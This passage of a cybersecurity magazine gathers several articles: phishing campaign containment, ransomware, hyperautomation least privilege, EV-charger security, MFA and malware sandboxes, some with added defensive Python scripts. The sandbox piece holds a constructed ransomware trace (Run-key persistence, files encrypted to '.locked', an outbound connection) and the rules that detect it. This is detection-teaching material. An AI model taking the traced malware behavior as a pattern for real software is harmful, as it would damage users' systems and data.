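# invented; a real gateway's format differs, so LINE_RE is the part to adapt).
GATEWAY_LOG = """\
2021-12-01T08:02:11Z msgid=m1 from=billing@invoice-portal.example to=alice@corp.example subject="Invoice 4471 overdue" url=https://invoice-portal.example/pay/4471
2021-12-01T08:02:14Z msgid=m2 from=billing@invoice-portal.example to=bob@corp.example subject="Invoice 4472 overdue" url=https://invoice-portal.example/pay/4472
2021-12-01T08:05:40Z msgid=m3 from=newsletter@vendor.example to=carol@corp.example subject="December updates" url=https://vendor.example/news
2021-12-01T08:09:02Z msgid=m4 from=accounts@invoice-portal.example to=dave@corp.example subject="INVOICE 4475 Overdue" url=https://invoice-portal.example/pay/4475
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) msgid=(?P<msgid>\S+) from=(?P<sender>\S+) to=(?P<rcpt>\S+) '
    r'subject="(?P<subject>[^"]*)" url=(?P<url>\S+)$'
)


@dataclass(frozen=True)
class MailEvent:
    ts: str
    msgid: str
    sender: str
    rcpt: str
    subject: str
    url: str


def parse_log(text):
    """Parse gateway lines; lines that do not match are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(MailEvent(**m.groupdict()))
    return events


def campaign_key(ev):
    """Fingerprint a campaign: sender domain, subject with numbers collapsed,
    and the host of the lure link. Attackers rotate the mailbox local part and
    the invoice number between recipients, so those are deliberately ignored."""
    domain = ev.sender.rsplit("@", 1)[-1].lower()
    subject = re.sub(r"\d+", "#", ev.subject.lower()).strip()
    host = (urlparse(ev.url).hostname or "-").lower() if ev.url != "-" else "-"
    return (domain, subject, host)


def find_campaign(events, reported_msgid):
    """Return the campaign key of the reported message and every event in it."""
    reported = [e for e in events if e.msgid == reported_msgid]
    if not reported:
        raise ValueError(f"reported message {reported_msgid} not found in log")
    key = campaign_key(reported[0])
    return key, [e for e in events if campaign_key(e) == key]


def playbook(events, reported_msgid, reporter):
    """Containment actions for one user report. Indicators are blocked first so
    copies still in transit are stopped; then every other recipient's copy is
    pulled from their mailbox. The reporter already deleted theirs."""
    key, hits = find_campaign(events, reported_msgid)
    actions = [("block_sender_domain", key[0])]
    if key[2] != "-":
        actions.append(("block_url_host", key[2]))
    for e in sorted(hits, key=lambda e: e.ts):
        if e.rcpt != reporter:
            actions.append(("quarantine", e.rcpt, e.msgid))
    return actions


if __name__ == "__main__":
    for action in playbook(parse_log(GATEWAY_LOG), "m1", "alice@corp.example"):
        print(*action)
```

Run as a script it prints the four actions that follow from Alice's report of message m1: block the sending domain and link host, then quarantine Bob's and Dave's copies, while Carol's unrelated newsletter is left alone. The normalization is the part to tune: collapsing digits catches per-recipient invoice numbers, but a campaign that rotates sending domains needs a key built on the attachment hash or URL path instead.<br />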
It’s no longer if, but when.<br />
Ransomware is a cyberthreat that constantly affects our society, and organizations are no strangers to the term. Yet the overarching question remains: how does my business ensure protection? It is safe to say that no organization is completely safe, as cybercriminals are actively targeting every industry, but there are ways to increase and prioritize protection. Cybersecurity is an ongoing priority that should be top of mind year-round. Building a strong foundation, staying educated about current technology and being transparent with partner departments inside the organization are just the start. But taking the initiative to start is the first step in securing your data against the next ransomware attack.<br />
About the Author<br />
Jesper Zerlang is the CEO of LogPoint and has led LogPoint to become<br />
one of the dominant SIEM vendors in Europe. He has more than 25<br />
years’ experience in the IT industry and has held top management<br />
positions at Telia Company, Dell Computer and Compaq. His strong<br />
customer and partner focus, passion for his employees and strong<br />
entrepreneurial spirit helps to spark innovation and growth at LogPoint.<br />
He has supplemented his leadership skills with executive management<br />
programs at Harvard Business School. Jesper can be reached at<br />
https://www.logpoint.com/en/.<br />
The Benefits of Hyperautomation<br />
By Nathan Hull, Principal Solutions Architect, Technologent<br />
Hyperautomation, in short, is the process of automating business automation, or at least that is the goal. The term was coined by Gartner in 2019 and implies a framework for scaling business automation by combining complementary technologies to augment business processes. The benefits of hyperautomation extend beyond the simple cost savings of reduced overhead from automating tasks. Hyperautomation reduces the cost of implementing business process automations and increases the use of other technologies such as ML and AI within the organization. Beyond process efficiency and productivity there are other tangible benefits, for example an improved customer perception of the organization because products or services are delivered faster. Hyperautomation also creates opportunities for business and process improvement: as more workflows are digitized, more data can be collected, analyzed and ultimately translated into better business decisions.<br />
Foundation is key! If I could stress only one component common to successful technology projects, it would be that. Having mature business processes in place and a crystal-clear picture of what a process should be before taking on any automation project is highly recommended. At the end of the day, business process automation typically mimics what an individual user would do to complete a set of tasks. If the individual whose tasks are being modeled is completing them incorrectly, automating them is not going to benefit the organization. Having defined goals and outcomes is essential for project success, and implementing hyperautomation is no exception.<br />
Business automation almost always spans multiple organizational units. For instance, there is typically a need for IT governance and oversight as well as in-depth insight from the owner of the process to be automated. Therefore, to be most effective, the business must drive adoption and have appropriate executive sponsorship so that interdepartmental friction does not hinder the project. How well the processes are understood by all parties, and how well established interdepartmental communication is, are critical. Identifying the right automation tools to build a hyperautomation framework is also important. For instance, if there are regulatory or organizational compliance requirements, having automation tools that can support those policies is obviously key to an appropriate solution.<br />
Once an organization has a clearly defined use case for hyperautomation, it is a general best practice to initially limit the number of processes or tools to be automated. Trying to combine too many tools or automate too many processes in a short time frame can prove extremely challenging and increases the potential for negative impact on the organization. As complexity increases, so does the risk of project failure. Starting small and spelling out success criteria proves immensely valuable once you are ready to expand the scope of a hyperautomation project.<br />
Hyperautomation security is an important consideration and should be evaluated against the organization's security policy and any overarching regulations or compliance mandates. Security policies for business automation systems generally focus on access control, given the nature of the products: most tasks are transactional, and it is uncommon for the platform itself to store data. However, a malicious user gaining access to sensitive data through an automation tool is plausible, and if the tool itself were used to harvest sensitive data from automated actions the impact could be substantial. Regarding access controls, it is important to understand the difference between the roles of the hyperautomation components and the user roles they act on behalf of when completing automations. As an example, automating HR onboarding does not require the automation components to have the same permissions as an HR employee. The HR employee will likely have a much broader role, with access to many systems unrelated to the onboarding tasks. The permissions allocated to the automation systems should cover only what is required to perform the expected tasks and nothing more.<br />
Other security concerns may exist depending on the organization such as varying geographic regulations,<br />
privacy laws, etc.<br />
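One practical way to arrive at the "nothing more" the onboarding example above calls for is to derive the automation identity's permissions from what it actually did, rather than from the human role it replaces. The Python script below is an added example for this article, not Technologent code or any specific automation product: the HR role, the service account name, the permission names and the audit log lines are all constructed, and the "service:*" wildcard convention is an assumption. It counts the actions the onboarding bot was allowed and denied, then splits the copied HR role into grants to keep, grants to remove, and denied actions for a human to review.<br />

```python
import re
from collections import Counter

# Permissions of a human HR employee (constructed for this example). Copying
# this set onto the onboarding bot is the anti-pattern the text warns about.
HR_EMPLOYEE_ROLE = {
    "hris:create_employee", "hris:read_employee", "hris:update_salary",
    "payroll:*", "idp:create_user", "idp:add_to_group", "idp:reset_password",
    "mail:create_mailbox", "benefits:enroll",
}

# Constructed audit log: what the onboarding automation actually did over a
# review period, plus one action the platform denied it and one human entry.
AUDIT_LOG = """\
2021-11-03T09:12:00Z actor=svc-onboarding action=hris:create_employee result=allow
2021-11-03T09:12:01Z actor=svc-onboarding action=idp:create_user result=allow
2021-11-03T09:12:02Z actor=svc-onboarding action=idp:add_to_group result=allow
2021-11-03T09:12:02Z actor=svc-onboarding action=idp:add_to_group result=allow
2021-11-03T09:12:03Z actor=svc-onboarding action=mail:create_mailbox result=allow
2021-11-03T09:12:04Z actor=svc-onboarding action=payroll:add_to_payroll result=allow
2021-11-03T09:12:05Z actor=svc-onboarding action=idp:assign_license result=deny
2021-11-03T10:40:17Z actor=hr.jane action=hris:update_salary result=allow
"""

LINE_RE = re.compile(r"actor=(?P<actor>\S+) action=(?P<action>\S+) result=(?P<result>\S+)")


def observed_actions(log, actor):
    """Count allowed and denied actions for one identity in the audit log."""
    allowed, denied = Counter(), Counter()
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if not m or m.group("actor") != actor:
            continue
        bucket = allowed if m.group("result") == "allow" else denied
        bucket[m.group("action")] += 1
    return allowed, denied


def grant_covers(grant, action):
    """A grant covers an action if it names it exactly or is a 'service:*'
    wildcard for the same service (assumed convention for this example)."""
    if grant == action:
        return True
    return grant.endswith(":*") and action.startswith(grant[:-1])


def rightsize(granted, allowed, denied):
    """Derive a least-privilege policy from observed usage.
    keep:   grants actually exercised (wildcards replaced by the concrete actions)
    remove: grants never exercised, plus every wildcard
    review: actions the automation attempted but was denied; a human decides
            whether the task genuinely needs them before anything is added."""
    keep, remove = set(), set()
    for grant in granted:
        used = {a for a in allowed if grant_covers(grant, a)}
        if not used:
            remove.add(grant)
        elif grant.endswith(":*"):
            keep |= used          # narrow the wildcard to what was really needed
            remove.add(grant)
        else:
            keep.add(grant)
    return {"keep": sorted(keep), "remove": sorted(remove), "review": sorted(denied)}


def onboarding_policy():
    allowed, denied = observed_actions(AUDIT_LOG, "svc-onboarding")
    return rightsize(HR_EMPLOYEE_ROLE, allowed, denied)


if __name__ == "__main__":
    for bucket, perms in onboarding_policy().items():
        print(f"{bucket}: {', '.join(perms) or '-'}")
```

The output keeps five concrete grants, drops the four the bot never used together with the payroll wildcard, and flags the denied license assignment for review rather than silently adding it. Two cautions apply in practice: the review period must cover every variant of the process (quarterly tasks will not show up in a two-week log), and removals should be staged with alerting on new denials so a missed path fails visibly instead of breaking onboarding.<br />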
As with any system critical to business continuity, appropriate safeguards should be implemented to protect the business from system failure. Concepts such as high availability and disaster recovery are an important factor when considering what role automation will play in your business. Setting appropriate service level expectations will aid the supportability of the platform and the adoption of these technologies.<br />
Ultimately, hyperautomation offers a more complete path for organizations to realize the benefits of automation and will likely have a profound impact on multiple areas of business in the future.<br />
About the Author<br />
Nathan Hull, Principal Solutions Architect for Technologent.<br />
With more than 15 years of industry experience, Nathan works with clients as a transformational IT consultant. He assists organizations in solving strategic, operational and technological challenges, and has a reputation for motivating and inspiring teams through the well-organized, efficient implementation of emerging technologies.<br />
Nathan can be reached online on the company website http://www.technologent.com/<br />
Electric Vehicle Charging: The Next Cyberattack Frontier<br />
By Prof. Thomas R. Köhler, Member of the Board of Juice Technology AG<br />
The International Energy Agency estimates that the global number of electric cars, buses, vans and heavy trucks on the road will reach 145 million by 2030. In the U.S., estimates are that 28 million EVs will be sold within that timeframe, in line with the administration's goal of 50% of new car sales being electric by 2030. This will create significant demand for more public charging stations and for flexible options such as portable chargers that work at home or on the road. Behind every charging operation lie millions of lines of code and a wealth of personal and network data. The global cybercriminal community, always looking for new ransomware opportunities, will find this valuable data ripe for attack. One U.K.-based security research company, Pen Test Partners, has already found, across several charging devices it tested, that an attacker could remotely take control of the device, enabling them to read user data or even pivot into the owner's home network via a wallbox. The researchers found vulnerabilities in both home devices and charging networks.<br />
Unfortunately, the EV industry (car manufacturers, charging station suppliers, networking solutions and service providers) has not made cybersecurity a top-of-mind priority. While businesses in other sectors have made strides in protecting their data and networks, many vending machines, for example, are better protected than charging stations.<br />
The specific risks posed by vulnerable charging stations and unprotected components are plentiful. Insufficient data protection can lead to leaks of user data, manipulation of billing systems, extortion demands to infrastructure operators under threat of denial of service, and illegal access to businesses' internal networks.<br />
A lack of advanced cybersecurity measures can also have a devastating impact on charging station operations, causing distress to operators and consumers. Cybercriminals can steal charging current, bring down the network with a denial-of-service attack, and even endanger the stability of the local or area-wide electricity network by repeatedly switching the charging current of many stations on and off simultaneously. An attack can also damage the vehicle battery being charged.<br />
All of these risk factors make a good case for the EV industry to implement cybersecurity practices that protect EV customer data and prevent network intrusion and the potentially costly loss of operations. In this era of compliance and data privacy concerns, the EV industry, notably charging station networks and suppliers, also cannot afford data breaches that damage customer confidence and corporate image.<br />
ISO/IEC 27001 Certification<br />
First and foremost, ISO information security certification should be required of any charging station supplier, whether they supply portable chargers, the networking applications that drive the charging operation, or any component that is connected to a network and thus exposed to cyber threats. ISO/IEC 27001 is widely regarded as the most important information security certification worldwide. It demonstrates that measures for ensuring information security and data protection have been implemented and are regularly monitored and reviewed. Note that the certificate attests to the supplier's information security management system rather than to the security of any individual product, so it complements, and does not replace, security testing of the devices themselves. This proof is essential to developing a secure charging infrastructure and to protecting the data generated by EV users, industry business partners, other supplier partners and investors.<br />
A Software-First Strategy<br />
Bringing the charging industry into 21st century cyber defense practices will be challenging. Many suppliers are “old world” thinkers, the “plugs and cables” hardware companies. On the other side are startups that treat software security as an add-on and have never focused closely on software. They tend to underestimate the diverse range of threats that deficient software security exposes them to.<br />
Both types need to change their mindset to “software-first.” After all, charging stations have long been highly complex, software-controlled systems that are effectively IoT nodes. They must cope with large volumes of data, whether in communication with the vehicle being charged, with the electricity network, or with user authentication and usage billing services.<br />
These data streams offer numerous points of attack for malicious parties, not to mention physical access to the devices themselves. U.K. researchers found that, in one case, a simple screwdriver was all that was needed to reach the inner workings of a device. The vulnerability issue applies to popular charging stations and to portable chargers with IoT connectivity. What is also notable is that security research in this area is lagging despite the growing adoption of EVs and the increase in private and public charging stations.<br />
Going forward, EV dealers, charging infrastructure suppliers and partners should look for products built with a software-first approach, products designed from the start with data and network security in mind. In this way, charging stations can offer consumers a safe, secure way of charging their EVs.<br />
Creating Community<br />
Lastly, making charging cyber-safe will take a holistic approach that frankly does not exist yet in the EV industry. When suppliers do consider security, they usually think only about their own domains: the car manufacturer about its vehicle, the charging network operator about its stations, the energy provider about its grid, and the billing service provider about its payment transactions.<br />
Given that the EV industry is still in its early days in the U.S., it has a great opportunity to share cybersecurity research, share ideas on common data security problems and, working in concert, present consumers with a growing choice of secure charging options.<br />
If a major data breach were to hit a charging network, it would no doubt undermine consumer confidence. But if the EV industry gets ahead of the game in cybersecurity, everybody, consumers, suppliers and network operators alike, can win.<br />
About the Author<br />
Thomas R. Koehler is CEO of the German technology consultancy CE21 and a board member of the Swiss charging specialist JUICE TECHNOLOGY. Thomas has a degree in business informatics from Wuerzburg University and was appointed research professor at the Center of International Innovation at Hankou University (CN). He has founded multiple companies (web development, software) and has a background in strategy consulting. He is the author of more than a dozen books on technology topics, including the English-language books “Reorganizing Data and Voice Networks” (Artech House), “Understanding Cyber Risk” (Routledge Publishers / Taylor & Francis) and “The Digital Transformation of the Automobile” (Mediamanufaktur).<br />
Will Multi-Factor Authentication (MFA) Implementation<br />
Protect Countries from Cybercriminals?<br />
By Marcin Szary, CTO and co-founder, Secfense<br />
The American Login.gov service, the UK National Health Service's NHS login application, the Czech domain registry, the Swedish educational system eduID: these are just a few of the many government applications around the world whose security is now protected by Multi-Factor Authentication (MFA). More and more heads of state, including the President of the United States, Joe Biden, are calling for the implementation of MFA. Will this step protect countries from cybercriminals?<br />
The popularity of MFA, i.e. the use of an additional factor when logging in to an application (a one-time code, a cryptographic U2F key or another form of additional authentication), is growing noticeably.<br />
Cybercriminals do not waste their time, and the fast digitalization of everyday life only makes things easier for them. We buy online more and more often, so the number of online transactions is growing. Enterprises are investing in cloud technologies and businesses are moving into the virtual world. This emboldens cybercriminals, which in turn pushes governments into introducing stricter and stronger cybersecurity regulations. Today, protecting against cyberattacks is not an optional extra but simply a necessity.<br />
How does this relate to MFA? Multi-factor authentication provides much stronger assurance that the person on the other side of the monitor is who they claim to be. By implementing MFA, organizations ensure that a stolen login and password alone is not enough for an attacker to access their data. The technology giants have known this for years.<br />
Recent market research projects that the global MFA market will grow from USD 11.1 billion in 2021 to USD 23.5 billion by the end of 2026. Many companies, however, recognized the pressing need for MFA adoption across their organizations much earlier. Facebook, Google and Twitter were among the first to roll out the technology. Others, such as CA Technologies, Vasco Data Security International, RSA Security LLC and Symantec Corporation, anticipated the growth of the market and began large investments in research and development in this area as early as 2016.<br />
My way or the highway<br />
There is no need to convince anyone of the effectiveness of MFA, as the technology giants have already battle-tested it. Google has reported that none of its more than 85,000 employees have been successfully phished since 2017, when it required security keys for all staff. A recent declaration that MFA is a “must have” comes from Mark Risher, Senior Director of Product Management at Google. On May 6, 2021, he informed the media that Google account holders would soon be required to use multi-factor authentication if they want to keep using the company's services.<br />
And this should surprise no one, because today no company network is a secure castle that outsiders cannot enter. On the contrary: the growing number of applications in the cloud, and working from home and from unsecured networks, mean that every person who appears on our network must be treated as untrusted until verified. This approach is called the zero trust security model, in which the key to effective data protection is knowing who the person on the other side of the screen really is. Without this certainty, no other security measure is fully effective.<br />
A Google study found that simply adding a recovery phone number to an account prevents nearly 100% of automated bot attacks, 99% of bulk phishing attacks and 66% of targeted attacks.<br />
Too expensive, too hard<br />
So why is MFA, which experts consider one of the most effective methods of protecting users against identity theft, still used on only a handful of applications rather than organization-wide?<br />
The main obstacles to the widespread adoption of MFA in public organizations and institutions are complexity and cost. Implementing multi-factor authentication throughout an entire organization requires a lot of capital and time. Highly heterogeneous IT environments, for which it is difficult to find suitable tools, are another big obstacle.<br />
One approach is the user access security broker, which simply adds MFA between the application and the user. The security broker is placed as an intermediary layer that blends into the application, giving full control not only over the authentication phase but over the entire user session. Importantly, this does not require any changes to the application's code. It frees the organization from vendor lock-in and lets it take advantage of any MFA method, including the latest and safest authentication standards such as FIDO2.<br />
The example comes from above<br />
Because MFA effectively protects organizations against phishing and credential theft, governments of many countries around the world have also become interested in adopting it.<br />
A few months ago, on May 12, 2021, there was big news in the cybersecurity world: President Joe Biden signed an executive order to improve the nation's cybersecurity. The order called for the implementation of multi-factor authentication across the federal government within 180 days. And at September's Authenticate Virtual Summit, users, experts and vendors from around the world presented many case studies of how strong authentication helps secure online identities. Participants, including representatives of the UK's National Health Service (NHS), the US's login.gov and the Internal Revenue Service (IRS), agreed that authentication and the protection of digital identities is a top priority today and in the future.<br />
FIDO2 rules<br />
2021 has shown that the way governments think about MFA is fundamentally changing. The role of FIDO2, the open authentication standard developed by the FIDO Alliance, whose WebAuthn component was standardized by the W3C (World Wide Web Consortium), is growing rapidly. FIDO2 authentication is no longer just another authentication option; it is becoming the preferred choice of many government institutions as well as private organizations.<br />
What does this look like in practice? For example, the governmental Canadian Digital Service has rolled out hardware security keys that support all FIDO2-based methods. Authenticating with them is very simple: when logging in, for example to email, you enter your password and then additionally authenticate by inserting the security key into a USB port and pressing its button. At CZ.NIC, the Czech domain registry, whose mojeID service is accredited as a national digital identity provider and under eIDAS, 800,000 users have been able to log in to government services with FIDO2 since September 2021. In Sweden, a digital identity system has been implemented in the educational eduID portal with support for authentication using the FIDO Universal Second Factor (U2F) protocol.<br />
In the USA, the Login.gov service is likewise based on the FIDO2 standard, and in the United Kingdom the NHS login application uses biometrics. Similar practices are followed by the Korean government, with fingerprint biometrics as a second factor for 14 million users, and by Thailand, which has a dedicated website that helps organizations set up multi-factor authentication using FIDO technology.<br />
Overall, governments' move toward MFA as a scalable and cost-effective form of strong authentication is perfectly understandable. Countries' constant exposure to frequent cyberattacks, together with the growing pressure to widen access to public information and to act faster, especially in times of a pandemic, simply forces governments and public organizations to take steps that ensure sensitive data is protected with the strongest possible measures.<br />
Hopefully public officials and decision-makers will pursue MFA adoption across the board, and not secure only a fraction of government infrastructure with it. Only an across-the-board approach and the introduction of the zero trust security model have a chance of solving the problems of identity theft and data leaks.<br />
About the Author<br />
Marcin Szary, CTO & co-founder, Secfense.<br />
Marcin Szary is a co-founder, CTO, and the person responsible for Secfense architecture and product development. Marcin has almost 20 years of technical experience with a focus on security and identity management. Before Secfense he held the position of CTO in multiple startups in the mobile, telecom and security space, where he was responsible for R&D operations in the area of multi-factor authentication, mobile payments, notification services within GSM networks, and more.<br />
Marcin can be reached online at marcin@secfense.com, Marcin Szary | LinkedIn and at the company website https://secfense.com/<br />
Why Do You Need a Malware Sandbox?<br />
By ANY.RUN Team<br />
Malware sandboxes help solve the problem of identifying previously unknown malware samples: they are protection systems that let you evaluate the safety of software by running and analyzing it in an isolated virtual environment. This article walks you through what a sandbox is and why any organization needs this service.<br />
What is a malware sandbox?<br />
The malware sandbox is an established class of solutions on the market. The main task of a sandbox is to examine the objects placed in it, collect the events they generate (including network activity) for further analysis, and process the collected data. Each event is checked against configured policies.<br />
A sandbox is an isolated environment where an object, such as a suspicious file, is sent <strong>for</strong> analysis. The<br />
sandbox collects as much telemetry and context as possible from the pre-configured sensors in the<br />
network. The sensors can be any existing device or application: a mail gateway, workstation agents, or<br />
a firewall that sends files to the sandbox <strong>for</strong> inspection. Or a malware analyst can upload a file or submit<br />
a link <strong>for</strong> further research by themselves.<br />
It is important to check malware in different circumstances. And almost all operating systems are<br />
supported by a sandbox to reveal malware behavior. A customized sandbox is already a tool against<br />
targeted attacks. Customization, as always, depends on the user's priorities.<br />
Why do you need a malware sandbox?<br />
It is not always possible to detect malicious code with static analysis. The sandbox allows you to deploy a sample and examine its work and behavior dynamically. The tool helps to build protection against any malicious objects: backdoors, downloaders, bankers, ransomware, etc. Websites, applications, and operating systems – the service landscape is huge. The sandbox is often placed in the DMZ segment, between the perimeter firewall and the core.<br />
What is the difference between a sandbox and an antivirus?<br />
A malware sandbox dynamically analyzes objects in an isolated network environment that has no connection to the company's network and allows the object to reveal itself as much as possible. Host-based antivirus works the other way around: it aims to block malware and its actions. Antivirus or EDR is the next tier of protection. Most importantly, the malicious object should not reach the workstation.<br />
What types of objects are handled by the sandbox?<br />
These can be links, binaries, Word or Excel files, images, or any custom objects. It is worth mentioning that there is no sense in analyzing files larger than 300 MB. There are separate, specific solutions for analyzing large files, and this is very rarely needed.<br />
Malicious objects get to the sandbox from several sources such as firewalls, mail gateways, and WAFs, and many standard protocols are supported for the exchange: Syslog, ICAP, SMTP, NFS. You can integrate the sandbox via an API into almost any environment, so all kinds of organizations can benefit from this tool.<br />
Does the sandbox help protect against an APT attack?<br />
Yes, the sandbox helps in defending against advanced persistent threats (APT attacks) because it allows you to analyze events in depth. A malicious object can have different signatures and bypass the antivirus, but its behavior stays about the same, and that is what the sandbox shows. One of the main goals is to make the sandbox as attractive as possible for malware so that it exposes itself as much as possible in a controlled, secure environment. For example, the interactive approach of the ANY.RUN sandbox triggers malware that requires direct human actions. Drag a mouse, tap keys, create specific files and folders, open documents: do everything to trick the malware.<br />
Of course, you can create your own isolated environment for malware analysis from scratch. But it takes a lot of effort and time in preparation. And still, there is a chance that your sandbox will not be secure enough, will not be invisible to malware, or will not provide the necessary information. To speed up the process we recommend using ready-made solutions like ANY.RUN. It is an online service, so you can run a sample from anywhere and get results right away.<br />
Specialist qualifications for working with the sandbox<br />
With a competent and intuitive interface, a highly qualified employee is not required. Sandboxes like ANY.RUN make easy and fast analysis their main advantage. A little experience and a general understanding of cyber security processes are enough. To resolve incidents and carry out investigations you need a higher level, but all of the ANY.RUN service’s details and information are still displayed conveniently, so you won’t miss a thing and can carry out a complete analysis.<br />
Sandbox reports are transparent and readable (MITRE matrix, screenshots and videos, IOCs, behavior activities, etc.). The collected information is aggregated and optimized, so the report saves time for a technician.<br />
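The two points made above (a sample's signature changes while its behavior does not, and a report that names the observed behavior by MITRE technique) can be shown side by side in code. This is an added example, not code from the article or from ANY.RUN: the sample bytes, the JSON-lines sandbox trace and the rule weights are all constructed for illustration, and the technique IDs are quoted from MITRE ATT&CK.<br />

```python
import hashlib
import json
from collections import Counter

# Constructed sample bytes: SAMPLE_B is SAMPLE_A with one byte appended, which
# is enough to change the hash a signature check relies on without changing
# what the sample does when it runs.
SAMPLE_A = b"MZ\x90\x00 constructed-sample-bytes"
SAMPLE_B = SAMPLE_A + b"\x00"

# Signature database: only the hash of the sample we have already seen.
KNOWN_BAD_SHA256 = {hashlib.sha256(SAMPLE_A).hexdigest()}

# Constructed sandbox trace (JSON lines) of the kind a sandbox records while a
# sample runs. Both samples above would produce this same trace.
TRACE = r"""
{"event": "process_start", "pid": 1208, "image": "C:\\Users\\user\\Downloads\\invoice.exe"}
{"event": "registry_write", "pid": 1208, "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "name": "updater", "data": "C:\\Users\\user\\AppData\\Roaming\\updater.exe"}
{"event": "file_write", "pid": 1208, "path": "C:\\Users\\user\\Documents\\q3-report.docx.locked"}
{"event": "file_write", "pid": 1208, "path": "C:\\Users\\user\\Documents\\budget.xlsx.locked"}
{"event": "file_write", "pid": 1208, "path": "C:\\Users\\user\\Pictures\\holiday.jpg.locked"}
{"event": "file_write", "pid": 1208, "path": "C:\\Users\\user\\Desktop\\README_RESTORE.txt"}
{"event": "network_connect", "pid": 1208, "dst": "203.0.113.10", "port": 443}
"""

COMMON_EXTS = {"txt", "docx", "xlsx", "pdf", "jpg", "png", "log", "tmp"}
MALICIOUS_THRESHOLD = 50  # score at or above which the behavior verdict is malicious


def signature_verdict(sample: bytes) -> bool:
    """Static, hash-based check: matches only byte-identical known samples."""
    return hashlib.sha256(sample).hexdigest() in KNOWN_BAD_SHA256


def parse_trace(trace: str) -> list:
    """Parse JSON-lines sandbox events, skipping blank lines."""
    return [json.loads(line) for line in trace.splitlines() if line.strip()]


# Behavior rules: each is a predicate over the whole event list.
def run_key_persistence(events) -> bool:
    """Sample registers itself under a CurrentVersion\\Run key."""
    return any(e["event"] == "registry_write"
               and e["key"].lower().endswith("\\currentversion\\run")
               for e in events)


def mass_file_encryption(events, min_files: int = 3) -> bool:
    """Several user files rewritten with one added, non-standard extension."""
    exts = Counter(e["path"].rsplit(".", 1)[-1].lower()
                   for e in events if e["event"] == "file_write")
    return any(ext not in COMMON_EXTS and n >= min_files for ext, n in exts.items())


def outbound_connection(events) -> bool:
    """Any outbound connection: an isolated sandbox has no legitimate destinations."""
    return any(e["event"] == "network_connect" for e in events)


# (ATT&CK technique id, technique name, weight, rule), as a report would list them.
RULES = [
    ("T1547.001", "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", 40, run_key_persistence),
    ("T1486", "Data Encrypted for Impact", 60, mass_file_encryption),
    ("T1071.001", "Application Layer Protocol: Web Protocols", 20, outbound_connection),
]


def behavior_verdict(trace: str) -> dict:
    """Dynamic check: score the observed behavior against the rules above."""
    events = parse_trace(trace)
    hits = [(tid, name, weight) for tid, name, weight, rule in RULES if rule(events)]
    score = sum(weight for _, _, weight in hits)
    return {
        "malicious": score >= MALICIOUS_THRESHOLD,
        "score": score,
        "techniques": {tid: name for tid, name, _ in hits},
    }


def compare(sample: bytes, trace: str) -> dict:
    """Side by side: what the signature sees versus what the sandbox sees."""
    return {
        "sha256": hashlib.sha256(sample).hexdigest(),
        "signature_match": signature_verdict(sample),
        "behavior": behavior_verdict(trace),
    }


if __name__ == "__main__":
    for label, sample in (("A (known)", SAMPLE_A), ("B (repacked)", SAMPLE_B)):
        print(label, json.dumps(compare(sample, TRACE), indent=2))
```

Sample B fails the signature check while its behavior verdict is identical to sample A's, which is the gap the article says a sandbox closes.<br />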
Conclusion<br />
A sandbox is one of the most important elements in building corporate infrastructure protection. A modern sandbox not only blocks the spread of a malicious object but also structures a significant amount of dynamic analysis data, passing this data to a specialist for further evaluation or via standard exchange protocols to other cybersecurity products.<br />
The malware sandbox functions with almost any operating system and device. The use of this tool gradually speeds up both investigation and verdict issuance. On average, delays in issuing a verdict are a few minutes. The global sandboxing market is growing rapidly and is projected to double in 2 years. And it’s clear that a malware sandbox is an effective service that you definitely need.<br />
About the Author<br />
ANY.RUN is the first interactive online malware analysis sandbox. The service provides detection, analysis, and monitoring of cybersecurity threats. Based on the interactive approach to investigations, ANY.RUN lets users affect the virtual machine by launching various programs, changing configurations, rebooting the system, and running different scenarios. The user is in full control of the analysis flow in real time. Find out more here: https://any.run/.<br />
Multi-Cloud Security and Compliance: Challenges & Best Practices<br />
By Avi Shua, CEO and Co-Founder, Orca Security<br />
Organizations are increasingly moving their operations to not just one but, in many cases, multiple public clouds. In a recent State of the Cloud Strategy Survey by HashiCorp, 76% of respondents said that they were already pursuing multi-cloud strategies. A further 47% of those respondents also said that security was a top cloud inhibitor. Multi-cloud strategies complicate cloud security and compliance even more, since controls and policies need to be applied consistently across multiple cloud environments. However, by following a number of best practices, security teams can significantly minimize the complexity and overhead of securing a multi-cloud environment, allowing businesses to fully optimize their cloud strategy.<br />
What is a Multi-Cloud Strategy?<br />
A multi-cloud strategy is when organizations leverage multiple IaaS public cloud service providers - such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud - to optimize their IT services and infrastructure. Since each cloud provider offers slightly different services and pricing models, organizations can get the best service at the best price by utilizing multiple cloud providers.<br />
The concept is best explained by a supermarket analogy. For instance, you might like to shop at a natural grocer for some favorite organic items and therefore accept that the pricing is a little higher. However, for more staple items, you might choose to go to a regular store since the prices are much lower. In short, you’re optimizing your grocery shopping based on the individual offerings and prices of each different store, which is similar to a multi-cloud strategy.<br />
What’s the Difference Between the Cloud Platforms?<br />
Like supermarkets, all cloud providers have similar offerings, but each takes a slightly different approach. While by no means a full comparison, we have included a short summary of how each of the leading cloud provider platforms delivers value in different areas:<br />
• AWS offers the widest selection of services, including compute, storage, database, analytics, networking, mobile, developer tools, management tools, IoT, security, and enterprise applications.<br />
• Azure has the benefit of combining productivity and enterprise software (such as Office 365 and Teams) with flexible cloud computing resources for developers in one platform.<br />
• Google Cloud stands out for its technological advancement around open source technologies, especially containers, and played an instrumental role in the development of Kubernetes, a container orchestration platform that is now becoming an industry standard.<br />
What Are the Advantages of a Multi-cloud Strategy?<br />
It is not surprising that most companies are utilizing multiple cloud platforms, since this strategy allows companies to:<br />
• Optimize access to services: As described above, some cloud service providers are more specialized in providing certain services than other providers, so it makes sense to select the best cloud provider for each specific service that you require.<br />
• Spread risk and resilience: It’s always a good idea to avoid ‘putting all your eggs in one basket.’ For instance, if there is an outage or other issue with one cloud service provider, the other cloud platforms will likely not be affected.<br />
• Reduce cost and dependency: By adopting multiple cloud providers, enterprises can stay nimble and switch providers to optimize spending, rather than being locked into one provider and facing high operational costs to move services.<br />
Security and Compliance Challenges of Multi-cloud Environments<br />
Although it makes a lot of business sense to use multiple cloud providers, it can complicate security and compliance efforts tremendously since security controls and policies should be consistent across the board. With most native cloud provider security tools only covering their own platform, and not all third-party solutions supporting multiple cloud providers, security and compliance for multi-cloud environments can quickly become an operational nightmare.<br />
